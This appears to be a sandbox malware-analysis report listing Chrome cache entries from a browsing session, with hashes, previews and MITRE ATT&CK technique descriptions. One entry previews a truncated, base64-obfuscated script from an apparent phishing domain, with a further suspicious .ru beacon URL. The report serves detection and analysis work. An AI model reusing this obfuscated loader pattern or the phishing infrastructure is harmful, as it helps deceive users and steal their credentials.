SHA-256:	89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
SHA-512:	2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
Malicious:	false
Reputation:	unknown
URL:	https://fonts.jimstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
Preview:	wOF2......Hh..........H..............................Z..\|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.\|.......%..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.+.M E..`......R.$T

Chrome Cache Entry: 125

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (64241)
Category:	downloaded
Size (bytes):	167730
Entropy (8bit):	5.045981547409661
Encrypted:	false
SSDEEP:
MD5:	AFB5C64B13342F6E568093548D0A2A9F
SHA1:	95FC121CCCFDBA12443CF87A9C823486065A14AB
SHA-256:	238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
SHA-512:	6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
Preview:	@charset "UTF-8";./! \| Copyright 2017 Microsoft Corporation \| This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise././! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css /.body{margin:0}.context-uh

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4054
Entropy (8bit):	7.797012573497454
Encrypted:	false
SSDEEP:
MD5:	9F14C20150A003D7CE4DE57C298F0FBA
SHA1:	DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
SHA-256:	112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
SHA-512:	D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (955), with CRLF line terminators
Category:	downloaded
Size (bytes):	185061
Entropy (8bit):	2.6387264124630945
Encrypted:	false
SSDEEP:
MD5:	640D0DCFB2C231E3F0CF4EA5A4360984
SHA1:	206FB916D776B1C00F0D1A1860300C82A50135BD
SHA-256:	46A615487EC70AB4F50218D1CD200C5632BAB3967A0B051F9CF0706297458E9F
SHA-512:	A0EF1E8E5C968FF641D4A5510F263607A4E0BA961B78BC600AA89DD2D613A282B9F1F9AD608E42A06569325A4BDE66E163565A94B5D257E7BE272E7FB91BD15B
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/en-us?redir=true
Preview:	..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (7341), with CRLF line terminators
Category:	downloaded
Size (bytes):	19884
Entropy (8bit):	5.900066180227018
Encrypted:	false
SSDEEP:
MD5:	EFD18490BCE360E1D80C2C30F4D68ECE
SHA1:	766C14ACB000393CA352CA4ACD5963AA227A45BA
SHA-256:	9E6007F7CB314A23079D0DC3E83B3950C6AADB177F235AB1985DE6F9BACD0DFB
SHA-512:	94FD2EF4FE15D2FC5115572BC3C88058B30151ED74D496A816A52494BE9EEF7AAD3C0A4C3327CF52CD1137C6D749ACB43148E26F725703E20F3E198D4EBCF9C1
Malicious:	false
Reputation:	unknown
URL:	https://aial.gulamberwa.com/ERA9sgQ/
Preview:	Success is finding satisfaction in giving a little more than you take. -->.. Success is not built on success. It's built on failure. It's built on frustration. Sometimes it's built on catastrophe. -->..<script>../* It always seems impossible until it's done. */..if(atob("aHR0cHM6Ly9BaWFMLmd1bGFtYmVyd2EuY29tL0VSQTlzZ1Ev") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KI

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (7946)
Category:	downloaded
Size (bytes):	17943
Entropy (8bit):	5.479916331740073
Encrypted:	false
SSDEEP:
MD5:	C77A0A95624F39A91A3776C0EF07A668
SHA1:	EC798C78FB22A56415E6490C69D9EF8EE9D424B8
SHA-256:	16017F5E1AEC16BB7FB8696AFFADDB0E713D0DA38826E40442FD257C27A15757
SHA-512:	2C3A8531E4172FEABD724877B157CD16E9668C3F76B59EEF826FD4EE90EE449529D660A7CDF216436EA501127D914C542FD4A5563B515FB1B6745C954317C0E0
Malicious:	false
Reputation:	unknown
URL:	https://central-synagogue.jimdosite.com/
Preview:	<!doctype html>.<html lang="en">. <head>. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1">. <meta name="format-detection" content="telephone=no">. <link rel="preconnect" href="https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/" crossorigin>. <link rel="preconnect" href="https://jimdo-storage.freetls.fastly.net/" crossorigin>. <link rel="preconnect" href="https://fonts.jimstatic.com/" crossorigin>. <link rel='shortcut icon' type='image/png' href="https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/default-website-favicon.1a874ea70dbf3a4b0e0e..png" />. <title>Home \| Central Synagogue</title>. <script>. window.__dolphin_environment__ = 'prod';. </script>. . <meta name="robots" content="noindex, nofollow, noarchive"><meta name="twitter:card" content="summary_large_image">.<meta property="og:type" content="website">.<meta property="og:title" content="Home \| Cent

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 160 x 29, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6643
Entropy (8bit):	7.9363856114045594
Encrypted:	false
SSDEEP:
MD5:	FF8472E3BF43B21161820C66739E306C
SHA1:	85CA2B65F257F3F7E01A1DA6A3A315D831354781
SHA-256:	19AA2D8B099614802AB1DE769414E470FAF787B10DB41465B85BDB98DAE4278B
SHA-512:	A608125A20DF26CBD89E6D0EFA70FD4975BC5E76242718F49C24AD1E6469975969778F9049AA146153EF3612D731A9CFC00343A18A7C73CAEAA3CBC2B411154C
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.....................sRGB.........IDATh..zY.[.fDf..[..X;..b..,.-u..o..}.F....=}\|z.,.....)......pq.\"..@-.IszN/...N.."od,..._.~..>{o=....b.U+..P4..z"T.xB..$.DD..)0..G.?\|..l7/..%..vd.8..D............(..K..c0....r.....>\|M&._..UR%.f......`-..o.o-..'}%<.........V..@ff..@`.V..Xn.~7Q..x..S3......C.!X....8....1..d..v.&..5..03........"...2$.'...c.o..E.W.Mo{).Z..t. . 3L..<gx.\|......H.{-..F.....=......rP;...u...N.x......B_....M4M...b.7.....X~<..&..e..;..D.$.........2....i$.d..9.\.@.r,....z..+..W..9...b..}T.@..3O.q...D.{..C).m..6..7c).Z..........l...O.%........`.q..F..~.7..%nw...n......g..... ......Xy.....2.V...^.F.......-_.}-.......E~P......c.A 8...R0.."..Lf`G@.. .%...}...../B%...;..+.w..a.]M.._yo..@h...b.....Q+T..1(..... .........y.@.1.qI.<_.*........@hx..R..7Z7.C...c..p.YM.g.7G.7'...T.6~...........{g.'.\Q3...p..n.B....U4[.AM...3.....V.4.$4}...'.\vf.`$d.fff.<.Z...HNKz..J2...../@...?.....ZI .G.7......@jG.D....Q .../.t/[...^>...&.x............

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8133), with no line terminators
Category:	dropped
Size (bytes):	8133
Entropy (8bit):	5.757459338074317
Encrypted:	false
SSDEEP:
MD5:	DB657CE7B681315883893D1625F0BE36
SHA1:	6F818C7836FA03D6F2CBD792149641E3F6D5945D
SHA-256:	279E36F02515836E1C3123AD8A47222E03E9C68F30B6037753A5862C7606ECA8
SHA-512:	AC867697532B4D2C93A0936ED7B53AAC0A25B96D97FFEEF482CE4C9FC2BE61679E785A5A33FF217CB05BA52DD0ADF4645B965693E4D159B976E5487B98A9A641
Malicious:	false
Reputation:	unknown
Preview:	window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,j,k,o,s,B){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=parseInt(U(428))/1(parseInt(U(441))/2)+parseInt(U(412))/3+-parseInt(U(393))/4+-parseInt(U(432))/5(parseInt(U(410))/6)+-parseInt(U(406))/7+parseInt(U(415))/8(parseInt(U(382))/9)+-parseInt(U(343))/10(-parseInt(U(335))/11),g===e)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,943248),h=this\|\|self,i=h[V(399)],j={},j[V(369)]='o',j[V(331)]='s',j[V(396)]='u',j[V(423)]='z',j[V(339)]='n',j[V(392)]='I',j[V(404)]='b',k=j,h[V(391)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D\|\|void 0===D)return F;for(H=n(D),g[a0(367)][a0(388)]&&(H=H[a0(400)](g[a0(367)][a0(388)](D))),H=g[a0(370)][a0(351)]&&g[a0(336)]?g[a0(370)][a0(351)](new g[(a0(336))](H)):function(N,a1,O){for(a1=a0,N[a1(440)](),O=0;O<N[a1(434)];N[O+1]===N[O]?N[a1(341)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(386)][a0(420)](I),J=0;J<H[a0(434)];K=H[J],L=m(g,D,K),I(L)?(M=L==='s'&&!g[a0(362)](D[K]),a0(344

Chrome Cache Entry: 90

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	dropped
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256:	FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512:	F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

Chrome Cache Entry: 91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	downloaded
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
URL:	https://myqkz0xeyygfu46vw7rbgyj7tymnfyffdlgjxue07xli3ngcy4sae75xt1s.bfcgpixdwnw.ru/jFMohkiTdlrIZZTmWbltELHZpzbTmkaVWTCTMKOIQWDZUDNDLZMVXGOJFMXKSNXJQOUNWXQTXPNZWFTUQAW
Preview:	1

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (955), with CRLF line terminators
Category:	downloaded
Size (bytes):	201253
Entropy (8bit):	2.661810841903416
Encrypted:	false
SSDEEP:
MD5:	85DE642E1467807F64F7E10807DF3869
SHA1:	C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
SHA-256:	5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
SHA-512:	BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
Malicious:	false
Reputation:	unknown
URL:	https://www.microsoft.com/
Preview:	..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (513), with no line terminators
Category:	dropped
Size (bytes):	513
Entropy (8bit):	5.350826451115093
Encrypted:	false
SSDEEP:
MD5:	602C381194795DFC124FACDF48492EF1
SHA1:	90D594B7B5AF217824F2974514548C95FECFBFA5
SHA-256:	BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
SHA-512:	8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
Malicious:	false
Reputation:	unknown
Preview:	var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined\|\|ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN\|\|"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (13643)
Category:	downloaded
Size (bytes):	136701
Entropy (8bit):	5.511398316826998
Encrypted:	false
SSDEEP:
MD5:	893A0EF7D5FB8BEFF60859BB45D392A7
SHA1:	727FD7C9CB0D0793155AE798A7B4B52A01E4128F
SHA-256:	EC7785E15D58D2002511FD28C21AB8767C43F4F56A8142D5C738ADE18D5D3FA3
SHA-512:	226F6CBB76679E823CFB4DB3DE579A2115B89C512EAF1B1786FB387C03DC6B29D591C095C117AB66B02E805C9A8B1B5317A055196200D78F3B211599C766897C
Malicious:	false
Reputation:	unknown
URL:	https://jimdo-dolphin-static-assets-prod.freetls.fastly.net/renderer/static/6028b39045f5c171d373.css
Preview:	.rdtDR{position:relative;z-index:3;width:100%}.EiaDC{z-index:4}.eP8Dq{display:flex;flex-direction:column}...hcw3J{color:#323335}.hcw3J a:hover{color:#535353}.KNvh9{color:#fff}.KNvh9 a:hover{color:#dcdcdc}..sTtmz{word-wrap:break-word;word-break:break-word;overflow-wrap:break-word;box-sizing:border-box;width:100%;padding:20px 0}.sTtmz.FG8T_{padding:5px}.sTtmz a,.sTtmz a:hover{color:inherit}.sTtmz ol,.sTtmz ul{margin:0 0 0 30px;padding:0}.jkRjK h1,.jkRjK h2,.jkRjK h3,.jkRjK h4,.jkRjK h5,.jkRjK h6,.jkRjK li,.jkRjK p{display:inline;margin-right:4px;font-weight:400;font-size:18px}..YH0K9{position:relative;width:100%;padding:0;line-height:0}.YH0K9.gBwSj{background:#181818}.YH0K9.gBwSj.S5qxR{background:none}.YH0K9.BuD0P{background:#f2f2f2}.YH0K9.aPnO4{background:#fff}.YH0K9.mLGql{margin:auto}.YH0K9.bDzAf,.YH0K9.zDzDH{flex-grow:1}.YH0K9 iframe{width:100%;height:500px;border:0}.YH0K9 iframe.sK02L{height:232px}.YH0K9 iframe.GZWz7{height:450px}.YH0K9 iframe.U5VF7{height:175px}.gszAl{position:relat

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (41651)
Category:	dropped
Size (bytes):	131537
Entropy (8bit):	5.2237799798561975
Encrypted:	false
SSDEEP:
MD5:	30B7C335C62E5269E2D35B8E8B9F44B4
SHA1:	C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
SHA-256:	10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
SHA-512:	5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
Malicious:	false
Reputation:	unknown
Preview:	(function(){/*. @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. /.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a[""]\|\|{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0\|\|r===1&&n[2]===".."\|\|n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u\|\|y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	7514
Entropy (8bit):	7.962931370930298
Encrypted:	false
SSDEEP:
MD5:	FAF865FC58045851F54E83EB5B7ECC1D
SHA1:	AC09A971AAB288DCD36ADBCCB129C171DF58919D
SHA-256:	221A10F9FECD26AE1B244212F2DF1DE3F9901AAFDB0D1953AA79D52F455B2A96
SHA-512:	19BA744B560BF830D349E6D2D2A620D8C01E123018967824849778DA21FE862C3D6A642700FE44934D7C2F5A4A25026D485F294D0483613F166809142BDFDA5C
Malicious:	false
Reputation:	unknown
URL:	"https://jimdo-storage.freetls.fastly.net/image/491709067/5ecdd221-9962-4142-bd69-7e444fe242d4.png?quality=80,90&auto=webp&disable=upscale&width=160&height=96&trim=0,139,0,27"
Preview:	RIFFR...WEBPVP8LE.../....U...m..?..!........k...6Pg...G.v.._o;.{r.#...7................r.%./N..H.;tY..c..(p......d....ce..Dj.......... ........B.t.E.Ad.X.0.....kQ....@.. %km.:.rww.Y..e.8.gQ.....'.[1..dm.!P.=.v+....L....`...>5V.C.d...l....K.2.D .Co, .s.I..4..G...$LV.'.....$9.aff.,33333333.0cc.5VU.P..4.Pw...Lo5T.Sb..{........>C.r.\ ..e.FG>.}.0..o.6+.x..S.1..Q...c.........Z......d.9.....p.ll.U.:w`.m.~.D..t.....K.9....z...nl.....8F..Y5:L6....f.+/.\......m\|..l.6..V}c.U3[....Nt...Zn..G.{.m#.m.m{.e.V?...?.3.%z....4(o"...AJC..j.....".`.......Y...UE.J........Ny.=&.;._Y....%.........G......I....4E1..^r.Y....%".) ..~.7......i(4\W.K.8.@m8.@..?.]....6R.l..ug..^c0....1....lB.`P...z..O.>.`0.'$..W..... .....?...1....c.....C........=D.!..h0.....".p....2....4.'..x..H"..).A...3....B-}...fC..0@.@%.P.#b..3....c..>...Ow.....au..).B..\....d..p._..b.Y"Mw.P..s...r...NzJA...8...H....\`.$..\..=K.>..OT.%iA.Q.........sE_.a...N...9geg..k..p`$jq..<...............;tZ..Y

Static File Info

⊘No static file info

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
